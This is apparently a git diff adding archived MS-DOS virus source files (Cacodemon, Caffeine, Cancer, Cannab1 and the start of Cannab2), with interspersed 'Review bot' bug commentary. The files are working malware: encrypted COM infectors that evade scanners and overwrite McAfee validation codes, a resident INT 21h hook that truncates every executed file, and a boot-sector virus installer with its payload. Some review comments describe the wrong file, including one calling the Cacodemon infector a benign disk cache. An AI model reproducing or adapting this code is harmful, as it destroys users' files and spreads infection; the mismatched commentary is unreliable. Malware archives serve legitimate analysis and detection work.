100644 index 00000000..e672e119 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cacodmon.asm 
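Review bot: This file is archived as `Virus.MSDOS.Unknown.cache.asm`, but nothing in the hunk replicates or modifies files: the code is a resident INT 13h sector cache signed `(C)1985 S.Holzner` (with a PC Magazine reader note in the comments) that stores 512-byte sectors with a time stamp, keeps FAT/directory sectors pinned at `0FFFFH`, and evicts the least-recently-used entry in `STORE_SECTOR`. Anyone consuming this corpus as labelled malware samples will be misled, so the commit should either move it out of the `Virus.*` namespace or state the classification explicitly. A header comment such as `; NOTE: benign disk-cache TSR (INT 13h hook, LRU sector bank), not a virus - filed here for provenance only` at the top of the file would be the minimum. If the archive has evidence that this code was carried inside a virus sample, that provenance should be recorded in the same comment instead.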
@@ -0,0 +1,336 @@ + Org 0h ; Generate .BIN file + +Start: Jmp MainVir ; Jump to decryptor code at EOF + + Db '*' ; Virus signature (very short) + +; +; Decryptor procedure +; + +MainVir: Call On1 ; Push offset on stack + +On1: Pop BP ; Calculate virus offset + Sub BP,Offset MainVir+3 ; + + Push Ax ; Save possible error code + + Lea Si,Crypt[BP] ; Decrypt the virus with a + Mov Di,Si ; very simple exclusive or + Mov Cx,CryptLen ; function. +Decrypt: Lodsb ; + Xor Al,0 ; + Stosb ; + Loop Decrypt ; + +DecrLen Equ $-MainVir ; Length of the decryptor + +; +; Main initialization procedure +; + +Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at + Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) + Mov Cs:Start+100h,Ax ; + Mov Cs:Start[2]+100h,Bx ; + + Xor Ax,Ax ; Get original interrupt 24 + Push Ax ; (critical error handler) + Pop Ds ; + Mov Bx,Ds:[4*24h] ; + Mov Es,Ds:[4*24h]+4 ; + + Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place + Mov Word Ptr Cs:OldInt24+2[Bp],Es ; + + Lea Bx,NewInt24[Bp] ; Install own critical error + Push Cs ; handler to avoid messages + Pop Es ; when a disk is write + Mov Word Ptr Ds:[4*24h],Bx ; protected and such things + Mov Word Ptr Ds:[4*24h]+2,Es ; + Push Cs ; + Pop Ds ; + + Mov Ah,30h ; Check if DOS version is + Int 21h ; 3.0 or above for correct + Cmp Al,3 ; interrupt use + Jae NoCLean ; + Jmp Ready + +NoClean: Mov Ah,1ah ; Store DTA at safe place + Mov Dx,0fd00h ; + Int 21h ; + + Mov Ah,4eh ; FindFirsFile Function + +Search: Lea Dx,FileSpec[BP] ; Search for filespec given + Xor Cx,Cx ; in FileSpec adress + Int 21h ; + Jnc Found ; Found - Found + Jmp Ready ; Not Found - Ready + +Found: Mov Ax,4300h ; Get file attributes and + Mov Dx,0fd1eh ; store them on the stack + Int 21h ; + Push Cx ; + + Mov Ax,4301h ; clear file attributes + Xor Cx,Cx ; + Int 21h ; + + Mov Ax,3d02h ; open file with read/write + Int 21h ; access + + Mov Bx,5700h ; save file date/time stamp + Xchg Ax,Bx ; on the stack + Int 21h ; + Push Cx ; + Push Dx ; 
+ + Mov Ah,3fh ; read the first 4 bytes of + Lea Dx,OrgPrg[BP] ; the program onto OrgPrg + Mov Cx,4 ; + Int 21h ; + + Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file + Cmp Ax,'ZM' ; + Je ExeFile ; + + Cmp Ax,'MZ' ; Check if renamed weird exe- + Je ExeFile ; file + + Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected + Cmp Ah,'*' ; + Jne Infect ; + +ExeFile: Call Close ; If one of the checks is yes, + Mov Ah,4fh ; close file and search next + Jmp Search ; file + +FSeek: Xor Cx,Cx ; subroutine to jump to end + Xor Dx,Dx ; or begin of file + Int 21h ; + Ret ; + +Infect: Mov Ax,0fd1e[0] ; check if the file is + Cmp Ax,'OC' ; COMMAN?.COM (usually result + Jne NoCommand ; if COMMAND.COM) + Mov Ax,0fd1e[2] ; + Cmp Ax,'MM' ; + Jne NoCommand ; + Mov Ax,0fd1e[4] ; + Cmp Ax,'NA' ; + Jne NoCommand ; + + Mov Ax,4202h ; Jump to EOF + Call Fseek ; + + Cmp Ax,0f000h ; Check if file too large + Jae ExeFile + + Cmp Ax,VirS ; Check if file to short + jbe ExeFile + + Sub Ax,VirS + Xchg Cx,Dx + Mov Dx,4200h + Xchg Dx,Ax + Mov EOFminVir[BP],Dx + Int 21h + Mov Ah,3fh + Mov Dx,Offset Buffer + Mov Cx,VirS + Int 21h + Cld + Mov Si,Offset Buffer + Mov Cx,VirLen +On5: + Push Cx +On6: Lodsb + Cmp Al,0 + Jne On4 + Loop On6 +On4: Cmp Cx,0 + Je Found0 + + Pop Cx + Cmp Si,SeekLen + Jb On5 + Jmp NoCommand + +Found0: Pop Cx + Sub Si,Offset Buffer + Sub Si,Cx + Xor Cx,Cx + Mov Dx,EOFminVir[BP] + Add Dx,Si + + Mov Ax,4200h + Int 21h + Jmp CalcVirus + +EOFminVir Dw 0 + +NoCommand: Mov Ax,4202h ; jump to EOF + Call FSeek ; + + Cmp Ax,0f000h ; Check if file too large + Jb NoExe1 ; if yes, goto exefile + Jmp ExeFile ; + +NoExe1: Cmp Ax,10 ; Check if file too short + Ja NoExe2 ; if yes, goto exefile + Jmp ExeFile ; + + +NoExe2: Mov Cx,Dx ; calculate pointer to offset + Mov Dx,Ax ; EOF-52 (for McAfee validation + Sub Dx,52 ; codes) + + Mov Si,Cx ; move file pointer to the + Mov Di,Dx ; calculated address + Mov Ax,4200h ; + Int 21h ; + + Mov Ah,3fh ; read the last 52 bytes + Mov Dx,0fb00h ; of the file 
+ Mov Cx,52 ; + Int 21h ; + + Cmp Ds:0Fb00h,0fdf0h ; check if protected with the + Jne Check2 ; AG option + Cmp Ds:0fb02h,0aac5h ; + Jne Check2 ; + + Mov Ax,4200h ; yes - let virus overwrite + Mov Cx,Si ; the code with itself, so + Mov Dx,Di ; the file has no validation + Int 21h ; code + Jmp CalcVirus ; + +Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the + Jne Eof ; AV option + Cmp Ds:0Fb02h+42,0aac5h ; + Jne Eof ; + + Mov Ax,4200h ; yes - let virus overwrite + Mov Cx,Si ; the code with itself, so + Mov Dx,Di ; the file has no validation + Add Dx,42 ; code + Int 21h ; + Jmp CalcVirus ; + +Eof: Mov Ax,4202h ; not AG or AV - jump to + Call Fseek ; EOF + +CalcVirus: Sub Ax,3 ; calculate the jump for the + Mov Cs:CallPtr[BP]+1,Ax ; virus start + +GetCrypt: Mov Ah,2ch ; get 100s seconds for the + Int 21h ; encryption value. + Cmp Dl,0 ; if not zero, goto NoZero + Jne NoZero ; + Jmp GetCrypt ; + +NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor + + Lea Si,MainVir[BP] ; Move changed decryptor to + Mov Di,0fb00h ; a safe place in memory + Mov Cx,DecrLen ; + Rep Movsb ; + + Lea Si,Crypt[BP] ; Encrypt the virus and merge + Mov Cx,CryptLen ; it to the changed decryptor +Encrypt: Lodsb ; code + Xor Al,Dl ; + Stosb ; + Loop Encrypt ; + + Mov Ah,40h ; append virus at EOF or over + Lea Dx,0fb00h ; the validation code of + Mov Cx,VirLen ; McAfee + Int 21h ; + + Mov Ax,4200h ; Jump to BOF + Call FSeek ; + + Mov Ah,40h ; Write Jump at BOF + Lea Dx,CallPtr[BP] ; + Mov Cx,4 ; + Int 21h ; + + Call Close ; Jump to Close routine + +Ready: Mov Ah,1ah ; Restore DTA to normal + Mov Dx,80h ; offset + Int 21h ; + + Mov Ax,Cs:OldInt24[Bp] ; remove critical error + Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the + Xor Bx,Bx ; original handler at the + Push Bx ; interrupt table + Pop Ds ; + Mov Ds:[4*24h],Dx ; + Mov Ds:[4*24h]+2,Ax ; + Push Cs ; + Pop Ds ; + + Pop Ax ; restore possible error code + + Mov Bx,100h ; nice way to jump to the + Push Cs ; begin of the original 
host + Push Bx ; code + Retf ; + + Db ' (C) 1992 John Tardy / Trident ' + +Close: Pop Si ; why??? + + Pop Dx ; restore file date/time + Pop Cx ; stamp + Mov Ax,5701h ; + Int 21h ; + + Mov Ah,3eh ; close file + Int 21h ; + + Mov Ax,4301h ; restore file attributes + Pop Cx ; + Mov Dx,0fd1eh ; + Int 21h ; + + Push Si ; why??? + Ret + +; Db 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' + Db ' Satan spawn, the Caco-Daemon - Mor(T)alities Death ' + +; +; New critical error handler +; + +NewInt24: Mov Al,3 ; supress any critical error + Iret ; messages + +OldInt24 Dd 0 ; storage place for old int 24 + +CallPtr Db 0e9h,0,0 ; jump to place at BOF + +FileSpec Db '*.COM',0 ; filespec and infection marker + +OrgPrg: Int 20h ; original program + Db 'JT' ; + +CryptLen Equ $-Crypt ; encrypted part length + +VirLen Equ $-MainVir ; total virus length + +Buffer Equ 0f040h ; buffer offset +VirS Equ VirLen*2 + +SeekLen Equ Buffer+Virs + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.caffein.asm b/MSDOS/Virus.MSDOS.Unknown.caffein.asm new file mode 100644 index 00000000..37b9189d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.caffein.asm 
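Review bot: The critical-error vector is saved and restored incorrectly at the top of `Crypt:` and in `Ready:`: `Mov Es,Ds:[4*24h]+4` reads the word at 0:94h (the INT 25h offset) instead of the INT 24h segment at 0:92h, and the restore writes `Dx` (the saved "segment") to `Ds:[4*24h]` and `Ax` (the saved offset) to `Ds:[4*24h]+2`, so the vector left behind is neither the original handler nor `NewInt24`. DOS reloads INT 24h from the PSP when the process terminates, so the damage is probably confined to the remainder of the host's run, but that part is inferred rather than visible here. Since this is an archived sample I would annotate rather than repair: `; BUG: +4 is the INT 25h offset word, INT 24h segment is at +2` on the `Mov Es` line and `; BUG: offset/segment swapped on restore` at `Mov Ds:[4*24h],Dx`. The `Pop Si`/`Push Si` pair in `Close` (commented `why???`) only lifts the return address so the date/time and attribute words pushed by the caller can be popped; a comment saying so would save the next analyst a minute.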
@@ -0,0 +1,213 @@ +; ------------------------------------------------------------------------------ +; +; - Caffein - +; Created by Immortal Riot's destructive development team +; (c) 1994 The Unforgiven/Immortal Riot +; +; ------------------------------------------------------------------------------ +; Undetectable/Destructive COM-infector +; ------------------------------------------------------------------------------ +.model tiny +.code +org 100h + +v_start: + +firstgenbuffer db 0e9h,00h,00h + +virus_start: + + mov bp,0000h ; get delta offset + + call trick_tbscan ; + call decrypt ; decrypt virus + jmp short real_start ; and continue.. + +trick_tbscan: + + mov ax,0305h ; set keyb i/o + xor bx,bx ; too beat the + int 16h ; shit outta tbscan + ret + +write_virus: + + call encrypt ; write in encrypted mode + lea dx,[bp+virus_start] ; from start to virus end + mov cx,virus_end-virus_start ; bytes to write + mov ah,40h ; 40hex! + int 21h + call decrypt ; decrypt virus again + ret + + crypt_value dw 0 + +decrypt: +encrypt: + + mov dx,word ptr [bp+crypt_value] ; simple xor-encryption + lea si,[bp+real_start] ; routine included to + mov cx,(virus_end-virus_start+1)/2 ; avoid detection by scanners. + +xor_word: + + xor word ptr [si],dx ; encrypt all of the code! + inc si + inc si + loop xor_word + ret + +real_start: + + mov di,100h ; transer the first three + lea si,[bp+orgbuf] ; bytes into a buffer + movsw + movsb + + lea dx,[bp+new_dta] ; set's the dta... + mov ah,1ah + int 21h + + mov ah,4eh ; find first file + +commm: lea dx,[bp+com_files] +next: int 21h + jnc foundfile + jmp chk_cond + +foundfile: + + mov ax,word ptr [bp+new_dta+16h] ; ask file-time + and al,00011111b + cmp al,00000010b ; compare second-value + jne infect ; not equal - infect! 
+ + mov ah,4fh ; otherwise, search + jmp short commm ; next file in directory + +infect: + + lea dx,[bp+new_dta+1eh] ; clear file-attribute + xor cx,cx + mov ax,4301h + int 21h + + mov ax,3d02h ; open file + int 21h ; in read/write mode + + xchg ax,bx ; file handle in bx + + mov ah,3fh ; read 3 bytes + mov cx,3 ; from orgbuf + lea dx,[bp+orgbuf] + int 21h + + mov ax,4202h ; move file-pointer + xor cx,cx ; to end of file + cwd + int 21h + + cmp ax,666d ; check if file is + jb too_small ; too small + + cmp ax,64000d ; or too big + ja too_big ; to infect + + sub ax,3 + mov word ptr [bp+virus_start+1],ax ; create a new jump + mov word ptr [bp+newbuf+1],ax + + mov ah,2ch ; get random + int 21h ; value to use + mov word ptr [bp+crypt_value],dx ; as the xor + call write_virus ; value + + mov ax,4200h ; move file-pointer + xor cx,cx ; to tof of file + cwd + int 21h + + mov ah,40h ; write the new jump + lea dx,[bp+newbuf] ; + mov cx,3 + int 21h + +too_small: +too_big: + + mov dx,word ptr [bp+new_dta+18h] ; restore file's date + mov cx,word ptr [bp+new_dta+16h] ; and time and + and cl,11100000b ; mark the file + or cl,00000010b ; as infected + mov ax,5701h + int 21h + + mov ah,3eh ; close file + int 21h + + lea dx,[bp+new_dta+1eh] ; and put back + xor ch,ch ; the file-attributes + mov cl,byte ptr [bp+new_dta+15h] + mov ax,4301h + int 21h + +nextfile: + + mov ah,4fh ; seek next file + jmp next + +chk_cond: + + mov ah,2ch ; check if we should + int 21h ; make the pay-load + cmp dl,4d ; activate + jb resident + jmp short reset_dta + +newint21h proc far ; this code is memory resident + + cmp ax,4b00h ; check for execute + je create ; matched + jmp cs:oldint21h ; naaw +create: + mov ah,3ch ; truncate the file executed + int 21h ; and give it full-attribute + int 20h ; and just exit to dos + +newint21h endp + +in_mem: +resident: + + mov ax,3521h ; get original vector from + int 21h ; es:bx to int21h + + mov word ptr cs:oldint21h,bx + mov word ptr cs:oldint21h+2,es + + mov ax,2521h 
; set a new interrupt vector + lea dx,[bp+offset newint21h] ; for int21h to ds:dx + int 21h + + lea dx,[bp+offset in_mem] ; and load it resident + int 27h + int 20h ; and exit + +reset_dta: + + mov dx,80h ; puts back the dta to normal + mov ah,1ah + int 21h + + mov ax,100h + jmp ax + +signature db "[Caffeine] (c) 1994 The Unforgiven/Immortal Riot" +com_files db '*.com',0 +orgbuf db 0cdh,20h,90h ; buffer to save first 3 bytes +newbuf db 0e9h,00h,00h ; buffer to calculate new entry +oldint21h dd 0 + +virus_end: +new_dta: +end v_start diff --git a/MSDOS/Virus.MSDOS.Unknown.cancer.asm b/MSDOS/Virus.MSDOS.Unknown.cancer.asm new file mode 100644 index 00000000..11686803 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cancer.asm 
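Review bot: The XOR loop under `decrypt:`/`encrypt:` starts at `real_start` but its word count `(virus_end-virus_start+1)/2` is measured from `virus_start`, so each pass runs `real_start-virus_start` bytes past `virus_end` into `new_dta`; the image written by `write_virus` stops at `virus_end`, so the overrun only scrambles the in-memory DTA (and the encrypt/decrypt pair restores it), but the count misstates what `crypt_value` actually covers. The resident half is also inconsistent with the rest of the code about the delta offset: every other reference goes through `[bp+...]`, while `mov word ptr cs:oldint21h,bx`, `mov word ptr cs:oldint21h+2,es` and `jmp cs:oldint21h` use the absolute offset, so in an infected host the saved vector lands at a fixed offset inside the host image rather than in the virus's own variable; this appears to keep working only because `int 27h` is given `bp+in_mem` bytes, which covers that offset. I would annotate with `; NOTE: count is from virus_start but SI starts at real_start - xors past virus_end into new_dta` on the `mov cx,(virus_end-virus_start+1)/2` line and `; NOTE: no bp delta - lands in host image when bp != 0` on the `oldint21h` stores. The `newint21h` handler's `int 20h` after truncating the executed file is issued from inside an INT 21h handler with CS = the TSR segment, which is unlikely to return cleanly to the caller; worth a warning comment too, though I have not traced DOS's behaviour for that case.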
@@ -0,0 +1,128 @@
+ page ,132
+ name CANCER
+ title Cancer - a mutation of the V-847 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+
+olddta equ 80
+virlen equ offset endcode - offset start
+smalcod equ offset endcode - offset transf
+buffer equ offset endcode + 100
+newdta equ offset endcode + 10
+fname = newdta + 1E
+virlenx = offset endcode - offset start
+
+start:
+ jmp cancer
+
+ident dw 'VI'
+counter db 0
+allcom db '*.COM',0
+vleng db virlen
+n_10D db 3 ;Unused
+progbeg dd ?
+eof dw ?
+handle dw ?
+
+cancer:
+ mov ax,cs ;Move program code
+ add ax,1000 ; 64K bytes forward
+ mov es,ax
+ inc [counter]
+ mov si,offset start
+ xor di,di
+ mov cx,virlen
+ rep movsb
+
+ mov dx,newdta ;Set new Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+ mov dx,offset allcom ;Search for '*.COM' files
+ mov cx,110b ;Normal, Hidden or System
+ mov ah,4E ;Find First file
+ int 21
+ jc done ;Quit if none found
+
+mainlp:
+ mov dx,offset fname
+ mov ax,3D02 ;Open file in Read/Write mode
+ int 21
+ mov [handle],ax ;Save handle
+ mov bx,ax
+ push es
+ pop ds
+ mov dx,buffer
+ mov cx,0FFFF ;Read all bytes
+ mov ah,3F ;Read from handle
+ int 21 ;Bytes read in AX
+ add ax,buffer
+ mov cs:[eof],ax ;Save pointer to the end of file
+
+ xor cx,cx ;Go to file beginning
+ mov dx,cx
+ mov bx,cs:[handle]
+ mov ax,4200 ;LSEEK from the beginning of the file
+ int 21
+ jc close ;Leave this file if error occures
+
+ mov dx,0 ;Write the whole code (virus+file)
+ mov cx,cs:[eof] ; back onto the file
+ mov bx,cs:[handle]
+ mov ah,40 ;Write to handle
+ int 21
+
+close:
+ mov bx,cs:[handle]
+ mov ah,3E ;Close the file
+ int 21
+
+ push cs
+ pop ds ;Restore DS
+ mov ah,4F ;Find next matching file
+ mov dx,newdta
+ int 21
+ jc done ;Exit if all found
+ jmp mainlp ;Otherwise loop again
+
+done:
+ mov dx,olddta ;Restore old Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+
+ mov si,offset transf ;Move this part of code
+ mov cx,smalcod ;Code length
+ xor di,di ;Move to ES:0
+ rep movsb ;Do it
+
+ xor di,di ;Clear DI
+ mov word ptr cs:[progbeg],0
+ mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
+ jmp cs:[progbeg] ;Jump at program start
+
+transf:
+ push ds
+ pop es
+ mov si,buffer+100
+ cmp [counter],1
+ jne skip
+ sub si,200
+skip:
+ mov di,offset start
+ mov cx,0FFFF ;Restore original program's code
+ sub cx,si
+ rep movsb
+ mov word ptr cs:[start],offset start
+ mov word ptr cs:[start+2],ds
+ jmp dword ptr cs:[start] ;Jump to program start
+endcode label byte
+
+ int 20 ;Dummy program
+ int 20 ;???
+
+ db 0 ;Unused
+
+code ends
+ end start
+ 
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab1.asm b/MSDOS/Virus.MSDOS.Unknown.cannab1.asm
new file mode 100644
index 00000000..99c98bab
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cannab1.asm
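Review bot: `mainlp` prepends the virus to every `*.COM` that Find First/Find Next returns with no infection check at all - `ident dw 'VI'` is defined in the header but never compared against the file - so each run re-infects already-infected files, and because the write covers `ES:0` up to `eof = bytes_read + buffer`, every file grows by `buffer` bytes (the virus copy at ES:0 plus the gap up to `buffer`) per run. The open at `mov ax,3D02` is also not followed by a `jc`, so on failure the DOS error code in AX is used as the handle for the read, seek and write that follow. For an archived sample I would record this rather than fix it: `; NOTE: ident is never checked - reinfects on every run` next to `ident dw 'VI'`, and `; NOTE: no error check - AX is an error code here if the open failed` after the `int 21` under `mainlp`. The `mov cx,0FFFF` read into `ES:buffer` has no size check, so for hosts near the COM size limit the transfer presumably wraps within the 64K segment and overwrites the virus copy at ES:0 - I have not verified DOS's behaviour for a transfer that crosses the segment end.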
@@ -0,0 +1,231 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB1 圹 +;圹 圹 +;圹 Created: 4-Oct-91 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_8e equ 5Ch +data_17e equ 46Ch ;* +data_18e equ 7C00h ;* +data_19e equ 7C0Bh ;* +data_20e equ 7D31h ;* +data_21e equ 7D35h ;* +data_22e equ 7D73h ;* +data_23e equ 7E00h ;* +data_24e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab1 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_8e + js loc_2 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_3 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_1 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_12 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_3 ; Jump if carry=0 +loc_1: + mov dx,offset data_9+0B7h ; ('') + +cannab1 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_2: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_3: + retn +sub_1 endp + +data_9 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' 
+ db 07h, 24h +data_12 db 0EBh + db 3Ch, 90h + db 'Cannabis' + db 0 + db 02h, 02h, 01h, 00h, 02h, 70h + db 00h,0D0h, 02h,0FDh, 02h, 00h + db 09h, 00h, 02h, 00h + db 34 dup (0) + db 0FAh, 33h,0C0h, 8Eh,0D8h, 8Eh + db 0D0h,0BCh, 00h, 7Ch,0FBh,0BBh + db 0B1h, 7Ch,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 34h,0A3h, 31h, 7Dh + db 0A1h, 4Eh, 00h,0A3h, 33h, 7Dh + db 1Eh,0B8h, 10h, 00h, 8Eh,0D8h + db 0A1h, 13h, 03h, 48h, 48h,0A3h + db 13h, 03h, 1Fh,0B1h, 06h,0D3h + db 0E0h, 2Dh,0C0h, 07h, 8Eh,0C0h + db 0B9h, 00h, 02h,0BEh, 00h, 7Ch + db 8Bh,0FEh,0FCh,0F3h,0A4h, 89h + db 1Eh, 4Ch, 00h, 8Ch, 06h, 4Eh + db 00h + db 0F6h, 06h, 6Ch, 04h, 07h, 75h + db 08h + db 0BEh, 35h, 7Dh,0E8h, 0Eh, 00h +loc_6: + jmp short loc_6 +loc_7: + mov si,data_22e + call sub_2 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + int 19h ; Bootstrap loader + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near +loc_8: + lodsb ; String [si] to al + or al,al ; Zero ? 
+ jz loc_ret_9 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_8 + +loc_ret_9: + retn +sub_2 endp + + push ax + push ds + cmp ah,4 + jae loc_10 ; Jump if above or = + cmp ah,2 + jb loc_10 ; Jump if below + test dl,0FEh + jnz loc_10 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_10 ; Jump if not zero + call sub_3 +loc_10: + pop ds + pop ax + jmp dword ptr cs:data_20e + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + push cx + push bx + push di + push si + push es + mov di,2 +loc_11: + mov ah,2 + mov al,1 + mov bx,7E00h + mov cx,1 + push cs + pop es + pushf ; Push flags + call dword ptr cs:data_20e + jnc loc_12 ; Jump if carry=0 + xor ax,ax ; Zero register + pushf ; Push flags + call dword ptr cs:data_20e + dec di + jnz loc_11 ; Jump if not zero + jmp short loc_13 + db 90h +loc_12: + mov si,data_23e + mov di,data_18e + push cs + pop ds + cld ; Clear direction + mov cx,0Bh + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_13 ; Jump if zero + mov si,data_24e + mov di,data_19e + mov cx,33h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cx,1 + pushf ; Push flags + call dword ptr cs:data_20e +loc_13: + pop es + pop si + pop di + pop bx + pop cx + retn +sub_3 endp + + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Hey man, I don', 27h, 't' + db ' wanna work. I', 27h, 'm too sto' + db 'ned right now...' + db 7 + db 0Dh, 0Ah, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 70 dup (0) + db 55h,0AAh + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab2.asm b/MSDOS/Virus.MSDOS.Unknown.cannab2.asm new file mode 100644 index 00000000..1ebaf286 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab2.asm 
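Review bot: The INT 13h hook (the unlabelled `push ax`/`push ds` routine after `sub_2`) gates on `dl` being 0 or 1 via `test dl,0FEh` and on `ah` being 2 or 3, but never touches `dh`, and `sub_3` issues its read and write with only `ah`, `al`, `bx`, `cx` and `es` loaded, so the head comes from whatever request was intercepted. When that request addresses head 1, the routine reads cylinder 0/head 1/sector 1 into 7E00h, copies 33h bytes of it into the image at 7C0Bh, and writes the image back to that same sector, which is not the boot sector - unless `dh` is somehow always zero at that point, which the hunk does not establish. This is boot code carried as data in `data_12`, so I would annotate rather than change it: `; NOTE: dh not cleared - head comes from the intercepted request; head 1 hits cyl 0/head 1/sector 1, not the boot sector` above `loc_11:`. It would also help to say in a header comment that `cannab1` itself is only the installer (it writes `data_12` to A: sector 1 with AH=03h after a Y/N prompt) and that `data_12` is a 360K BPB followed by the boot-time code that the disassembler has rendered as `loc_6` onward.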
@@ -0,0 +1,278 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB2 圹 +;圹 圹 +;圹 Created: 7-Nov-91 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_24e equ 7C0Bh ;* +data_25e equ 7C11h ;* +data_26e equ 7C13h ;* +data_27e equ 7C15h ;* +data_28e equ 7C16h ;* +data_29e equ 7C18h ;* +data_30e equ 7C20h ;* +data_31e equ 7C3Eh ;* +data_32e equ 7C49h ;* +data_33e equ 7C50h ;* +data_34e equ 7DABh ;* +data_35e equ 7DAFh ;* +data_36e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab2 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab2 endp + 